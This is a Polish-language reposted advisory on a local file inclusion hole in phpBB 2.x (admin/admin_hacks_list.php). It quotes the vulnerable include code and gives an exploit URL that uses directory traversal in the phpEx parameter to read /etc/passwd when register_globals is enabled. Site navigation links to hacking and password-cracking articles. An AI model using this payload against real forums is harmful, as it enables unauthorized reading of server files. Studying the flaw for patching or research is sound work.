phpBB 2.x admin_hacks - Local Inclusion Vulnerability

admin - grudzień 31 2006 12:38:45 - 4227 wyświetleń
phpBB (admin/admin_hacks_list.php)
Podatność wersji: 2.x
Ryzyko: Bardzo wysokie

phpBB (admin/admin_hacks_list.php)
Podatność wersji: 2.x
Ryzyko: Bardzo wysokie

Wykorzystanie tego błędu umożliwia zdalne załączenie arbitralne lokalnych plików do phpBB.board_config[default_language] i zmiennej "phpEx" zawartej w admin_hacks_list.php. Luka znajduje się w admin_hacks_list.php (linie 30-37).

- Kod admin_hacks_list.php-

30: if( !empty($setmodules) )
31: {
32: include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx);
33: $filename = basename(__FILE__);
34: $module['General']['Hacks_List'] = $filename;
35:
36: return;
37: }

- Koniec kodu -

PRZYKŁAD_
Powodzenie ataku wymaga włączonej zmiennej "register_globals".

http://[hostname ]/[phpBB]/admin/admin_hacks_list.ph p?setmodules= 1&board_config[default_lang]=english&phpEx=../../../../. ./../../../etc/passwd

KONTAKT_

e-mail: nukedx@nukedx.com
website: http://www.nukedx.com
 
• Home
• Forum
• Artykuły
• Download
• Galeria
• Kontakt
• Encyklopedia hackingu
• Zabawa w szkole
• Adres IP dla początk...
• Jak hackować aby nie...
• Wybrane art. Kodeksu...
• Łamanie (hasła) z pl...
• Encyklopedia hacking...
• phpBB 2.x admin_hack...
• Programy do łamania ...
Jakiego systemu operacyjnego używasz?

• Windows [3154]
   
• Linux [2513]
   
• FreeBSD [2147]
   
• Solaris [1]
   
• Unix [2044]
   
• Mac OS [2257]
   
>• AmigaOS [2145]
   
• Problem z polskimi z... ~Tomahawk
• Parse error przy prz... ~mateusz
• problem z avatarami ~Filu
• mam phpbb daro ustaw... ~whitew
• Wyłączona rejestracj... ~Ksebki
• Programy do łamania hase... ~admin
• Łamanie (hasła) z pliku ... ~admin
• Adres IP dla początkując... ~admin
• Jak hackować aby nie wpa... ~admin
• Encyklopedia hackingu ~admin
windows 7 forum
żylaki
tatuaże
ahnenforschung in schlesien


(c) 2006 Wszelkie prawa zastrzezone.
testy | download | galeria | linki